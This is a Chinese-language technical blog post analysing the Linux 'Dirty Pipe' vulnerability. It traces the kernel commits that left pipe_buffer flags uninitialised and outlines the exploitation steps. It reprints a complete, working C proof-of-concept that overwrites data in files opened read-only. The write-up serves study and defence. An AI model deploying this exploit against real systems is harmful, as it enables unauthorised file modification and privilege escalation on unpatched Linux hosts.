pipe: merge anon_pipe_buf*_ops - linux commit f6dd97：在该 commit 前，内核通过比较 pipe_buf->ops 的地址来判断两块 pipe_buf 是否是可合并的。这种编码并不优雅，因为无论是否可合并，pipe_buf->ops 实际指向的几个函数指针都是同一个：

// fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations anon_pipe_buf_nomerge_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations packet_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

可以看到，这么 tricky 的代码非常的不优雅，因此在该 commit(f6dd97) 中，linux 重构了这部分代码，启用了新的 pipe buf 标志：PIPE_BUF_FLAG_CAN_MERGE：

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01  /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02  /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04  /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08  /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10  /* can merge buffers */     // <= 新引入的 flag

整个重构过程并没有问题，唯一带来的副作用就是引入了新的 pipe buf 标志：PIPE_BUF_FLAG_CAN_MERGE。

尽管第一个 commit 引入了字段未初始化漏洞，但该漏洞仍然无法造成较大的影响，因为可选的几个 pipe buf flag 中没有什么是可用于利用的。但是当第二个 commit 引入了新的 pipe buf flag：PIPE_BUF_FLAG_CAN_MERGE 时，该字段未初始化漏洞就非常的致命了，因为新的 pipe_buf 可以通过未初始化漏洞，来重用旧的 flag，例如 PIPE_BUF_FLAG_CAN_MERGE，来打破 page buf 的完整性，使得允许对那些本不该写入的页进行写入（例如本不该带有 PIPE_BUF_FLAG_CAN_MERGE 标志的页，诸如文件缓存页等等）。

注意，这里说的只读页，在 pipe 中并非使用权限控制等技术来保证不写，而是通过 pipe 所实现的逻辑来保证。因此，当 pipe 实现的逻辑出现了问题，那么 pipe 就可以尝试写入只读页，进而达到任意文件写的目的。

五、漏洞利用

通过上面的代码分析我们可以简单推断出这样的一条漏洞利用链：

创建管道（务必不要带上 O_DIRECT）
往管道中直接写入大量数据，使得 pipe 结构体中所有 page buf 的 flag 全部都设置了 PIPE_BUF_FLAG_CAN_MERGE 标志。
从该管道中将数据全部读取出来，释放所有 page buf。
调用 splice，将数据长度不与页大小对齐的可读文件数据，传递至该管道中。这样在管道的 head 位置，势必会有一个 page buf，其中 page 指向文件缓存，flags 为 PIPE_BUF_FLAG_CAN_MERGE。

因为 page buf 在重分配时不会初始化 flags，因此这里的 flags 将仍然保留为 PIPE_BUF_FLAG_CAN_MERGE。
直接继续往该管道中写入目标数据，这样由于 PIPE_BUF_FLAG_CAN_MERGE 标志仍然存在，新写入的数据将会直接与 page buf 所指向的文件缓存合并。
此时访问该文件，则内核会将被修改后的文件缓存中的数据返回，这样便可达到在内核层面任意文件写的目的。

需要注意的是，通过漏洞来“意外”修改文件缓存，不会使该文件缓存重新写回磁盘上。只有当内核的其他模块主动改写了这块文件缓存，使得该文件缓存变脏（dirty），这样才会把被修改后的文件缓存保存回磁盘上。

内核判断一个文件缓存是否 dirty，并非判断上面的数据有无被改写，而是判断其 dirty 标志。通过 dirty pipe 漏洞来改写文件缓存并不会影响到上面的 dirty 标志。

介于 cm4all 那边已经给出了非常清晰易懂的 POC，因此这里直接贴出它的 POC：

#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];

/* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }

/* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }

/* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

/* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

/* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }

struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

/* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);

/* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

/* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

printf("It worked!\n");
    return EXIT_SUCCESS;
}

运行结果如下：

可以看到运行的非常顺利，成功在只读打开该文件的情况下，完成对该文件的写入。

二、环境搭建

三、代码浅析

1. pipe 相关结构体

a. pipe_inode_info

b. pipe_buffer

c. iov_iter

2. pipe_read 函数

3. copy_page_to_iter 相关

4. copy_to_iter 相关

5. pipe_write 函数

6. do_splice 函数

四、漏洞成因

五、漏洞利用

Recommend

HWS夏令营之 GDB调一切

湖南科技大学考研数据分析

Deep Forest论文笔记

江山万里：解锁房地产广告影片新姿势

常用距离总结

当元宇宙碰上中国风，被狠狠美到了！

pwnable.tw 部分题解

Python函数的进阶知识(一)

和媳妇一起学Pwn 之 seethefile

日常学习中问题

About Joyk